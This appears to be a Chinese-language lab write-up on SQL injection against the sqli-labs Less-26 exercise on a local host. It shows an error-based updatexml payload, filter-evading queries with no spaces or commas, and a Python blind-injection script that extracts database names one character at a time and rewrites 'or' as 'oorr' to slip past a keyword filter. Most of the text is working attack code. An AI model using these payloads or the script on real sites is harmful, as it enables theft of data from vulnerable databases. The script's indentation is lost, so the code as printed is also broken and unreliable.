利用報錯注入證明可以dump數(shù)據(jù)
http://127.0.0.1/Less-26/?id=0%27||(updatexml(1,concat(0x5e,version(),0x5e),1))||%27%27=%27dsa
重新利用明注腳本批量跑
這個好叼
select(mid(user()from(4)for(1)))
沒有空格 , 沒有逗號
select(schema_name)from(information_schema.schemata)
這樣也沒有空格
然后結(jié)合一下
select(mid((concat((select(group_concat(username))from(users))))from(7)for(1)));
只需要修改中間的select和from后面的偏移就可以dump數(shù)據(jù)
select(ascii(mid((concat((select(group_concat(username))from(users))))from(7)for(1)))>255);
這樣就可以盲注
select(ascii(mid((concat((select(group_concat(schema_name))from(information_schema.schemata))))from(7)for(1)))<255);
測試一下 :
#!/usr/bin/env python
# encoding:utf8
import requests
import time
import sys
# config-start
sleep_time = 5
error_time = 1
# config-end
def getPayload(indexOfChar, mid):
column_name="schema_name"
table_name="schemata"
database_name="information_schema"
startStr = "0'||("
endStr = ")||'1'='"
payload = "select(ascii(mid((concat((select(group_concat(" + column_name + "))from(" + database_name + "." + table_name + "))))from(" + indexOfChar + ")for(1)))>" + mid + ")"
payload = startStr + payload + endStr
# 繞過對or的過濾
payload = payload.replace("or","oorr")
return payload
def exce(indexOfChar,mid):
# content-start
url = "http://127.0.0.1/Less-26/?id="
tempurl = url + getPayload(indexOfChar,mid)
content = requests.get(tempurl).text
# content-end
# judge-start
if "Your Login name:" in content:
return True
else:
return False
# judge-end
def doubleSearch(indexOfChar,left_number, right_number):
while left_number < right_number:
mid = int((left_number + right_number) / 2)
if exce(str(indexOfChar + 1),str(mid)):
left_number = mid
else:
right_number = mid
if left_number == right_number - 1:
if exce(str(indexOfChar + 1),str(mid)):
mid += 1
break
else:
break
return chr(mid)
def search():
for j in range(1024): # 結(jié)果的長度
temp = doubleSearch(j, 0, 128) # 從255開始查詢
if ord(temp) == 1: # 當(dāng)為1的時候說明已經(jīng)查詢結(jié)束
break
if temp == ",":
print ""
else:
sys.stdout.write(temp)
sys.stdout.flush()
print ""
search()
